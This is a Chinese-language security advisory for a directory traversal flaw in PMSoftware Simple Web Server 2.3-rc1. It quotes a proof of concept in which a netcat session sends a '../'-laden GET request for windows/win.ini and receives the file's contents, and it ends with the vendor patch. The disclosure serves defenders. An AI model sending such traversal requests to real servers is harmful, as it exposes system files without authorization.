PMSoftware Simple Web Server目录遍历漏洞

PMSoftware Simple Web Server目录遍历漏洞

发布日期：2013-01-02
更新日期：2013-01-08

受影响系统：
PMSoftware PMSoftware Simple Web Server 2.3-rc1
描述：
--------------------------------------------------------------------------------
BUGTRAQ  ID: 57143
 
PMSoftware Simple Web Server是HTTP服务器应用。
 
Simple Web Server 2.3-rc1之前版本及其他版本没有正确过滤用户的输入，通过包含 (/../) 序列的特制URL请求，可允许远程攻击者遍历系统上的所有目录。
 
<*来源：CwG GeNiuS （cwggenius@gmail.com）
 
  链接：http://xforce.iss.net/xforce/xfdb/80962
        http://www.exploit-db.com/exploits/23886/
        http://packetstormsecurity.com/files/119239/Simple-Webserver-2.3-rc1-Directory-Traversal.html
        http://osvdb.org/show/osvdb/88877
 *>

测试方法：
--------------------------------------------------------------------------------

警 告

以下程序(方法)可能带有攻击性，仅供安全研究与教学之用。使用者风险自负！
# Exploit Title: Simple Webserver 2.3-rc1 Directory Traversal
 # Date: 01/02/2013
 # Exploit Author: CwG GeNiuS
 # Vendor Homepage: http://www.pmx.it
 # Software Link: http://www.pmx.it/download/sws-2.3-rc1-i686.exe
 # Version: 2.3-rc1 (and earlier)
 # Tested on: Windows 7 Enterprise SP1
 #
 #Vulnerability: When removing the preceding "/" from a GET
 #          request the webserver allows directory
#          traversal.
 #
 #Fix: I have spoken with the developer who has now
 #  released 2.3-rc2 to correct the vulnerability

 root@bt:~# nc -v 192.168.1.132 80
 192.168.1.132: inverse host lookup failed: Unknown server error : Connection timed out
 (UNKNOWN) [192.168.1.132] 80 (www) open
 GET ../../../../../../../../windows/win.ini http/1.1

 HTTP/1.1 400 Bad Request
 Server: PMSoftware-SWS/2.3
 Date: Wed, 02 Jan 2013 22:45:2 GMT
 Connection: close

 HTTP/1.1 200 Ok
 Server: PMSoftware-SWS/2.3
 Date: Wed, 02 Jan 2013 22:45:2 GMT
 Accept-Ranges: bytes
 Content-type:
 Content-Length: 403

 ; for 16-bit app support
 [fonts]
 [extensions]
 [mci extensions]
 [files]
 [Mail]
 MAPI=1
 [MCI Extensions.BAK]
 3g2=MPEGVideo
 3gp=MPEGVideo
 3gp2=MPEGVideo
 3gpp=MPEGVideo
 aac=MPEGVideo
 adt=MPEGVideo
 adts=MPEGVideo
 m2t=MPEGVideo
 m2ts=MPEGVideo
 m2v=MPEGVideo
 m4a=MPEGVideo
 m4v=MPEGVideo
 mod=MPEGVideo
 mov=MPEGVideo
 mp4=MPEGVideo
 mp4v=MPEGVideo
 mts=MPEGVideo
 ts=MPEGVideo
 tts=MPEGVideo
 

GET ../../../../../../../../windows/win.ini http/1.1

建议：
--------------------------------------------------------------------------------
厂商补丁：
 
PMSoftware
 ----------
 目前厂商已经发布了升级补丁以修复这个安全问题，请到厂商的主页下载：
 
http://www.pmx.it/software/product.asp?id=1